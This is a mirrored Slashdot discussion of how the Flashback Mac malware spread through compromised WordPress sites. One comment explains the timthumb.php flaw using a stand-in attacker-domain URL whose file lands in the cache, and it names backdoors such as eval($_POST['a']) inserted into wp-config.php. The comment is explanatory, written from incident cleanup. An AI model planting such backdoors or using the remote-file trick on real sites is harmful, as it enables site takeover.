Slashdot Mirror

← Back to Stories (view on slashdot.org)

Mac Flashback Attack Began With Wordpress Blogs

Posted by timothy on from the slashcode-was-lower-on-their-target-list dept.

With more on the Flashback malware plaguing many Macs, beaverdownunder writes with some explanation of how the infection grew so quickly: "Alexander Gostev, head of the global research and analysis team at Kaspersky, says that 'tens of thousands of sites powered by WordPress were compromised. How this happened is unclear. The main theories are that bloggers were using a vulnerable version of WordPress or they had installed the ToolsPack plug-in.'"

6 of 103 comments (clear)

  1. In the end, it's better that it happened by skipkent · · Score: 5, Insightful

    At it's height it was never as bad as some of the windows viruses have been, but it plants the seed that macs aren't safe and are just as vulnerable as any other OS.

    1. Re:In the end, it's better that it happened by oldlurker · · Score: 5, Informative

      Where did you hear this? At the cooler in Redmond?

      From the numbers it doesn't seem like an unlikely claim actually (single virus compromising percentage of installed base), though a citation would be nice so it made me check (source for numbers below):

      The Mach Flashback virus compromised around 600.000 Macs, which is around 1% of installed base.
      The single largest Windows-based infection ever was Conficker. At its peak in 2009, it infected about 0.7% of the total Windows installed base.

    2. Re:In the end, it's better that it happened by tao · · Score: 5, Funny

      Now we just need a botnet for Hurd... 1 infected computer would be enough for, say... 100% of the user base :)

    3. Re:In the end, it's better that it happened by WrongSizeGlass · · Score: 5, Informative

      I say make it worse next time! And, target all OS's!

      The Java exploit used to spread Mac Flashback wasn't Mac specific, it just went unpatched for several months longer on OS X than on Windows. All the while almost all Mac users surfed the internet with a false sense of impunity.

      I don't think any researchers have tried to figure out how many PC's were affected by the same Java exploit, but the impact this has had on the Mac user mindset - and Apple's security responses - should be rather sobering.

  2. Wordpress wasn't that vulnerable, timthumb was. by Anonymous Coward · · Score: 5, Informative

    "How this happened is unclear. The main theories are that bloggers were using a vulnerable version of WordPress or they had installed the ToolsPack plug-in."

    This it not unclear at all. There were a few security problems with WP in the last year. But a LOT of themes use the timthumb.php module to do dynamic rescaling of images. Timthumb used to be extremely vulnerable, you could download a file from http://www.youtube.com.attacker-domainname/anything.php, install it in the timthumb's cache and have full access like forever.

    Updating WP wouldn't do any good, as a fully updated WP installation can still run a vulnerable theme. Even when the flaws in timthumb were fixed and the theme is updated, these sites have been flooded with backdoors, varying from eval($_POST['a']) in wp-config.php to newly created admin users. (Admin users can edit .php files from /wp-admin, an admin user effectively has power to run any php code desired.)

    I've manually removed and analysed infections from several customers wordpress websites, all were hit by timthumb exploits. Some of these websites had literally dozens of backdoors, each of which gave full access to the site. I've seen malware that hid from googlebot to avoid detection. I've seen infections with timers, and infections that kept an IRC connection open to accept commands. These infections were just waiting for the right moment to be abused.

  3. Msc People are awake now, this is a good thing! by anthony_greer · · Score: 5, Interesting

    I have had non technical Mac users ask me about this, that means that they (or at least more of them than before) are open to advise about security and don't just smugly boast about Macs being invincible any longer. This makes everyone safer from my view.

    BTW the advise I give Mac users who ask is as follows:
    1: run apple menu->software update manually at least once a week, and download everything it suggests*
    2: use a non admin account for daily activity and NEVER provide admin creds unless you know exactly what it is using them for, you should never need to do this while surfing the web.
    3: Only get software from trusted sources, like the app store, SourceForge, or vendor web sites like Adobe or Autodesk.
    4: Switch to a platform where java is controlled and updated by the first party, Oracle and not a third party, Apple to ensure you have the best security possible.

    *Just as with windows or any other *NIX box, there is an exception to the all update thing, if you know that it will break your workflow or some component thereof, you can skip it while that is worked out.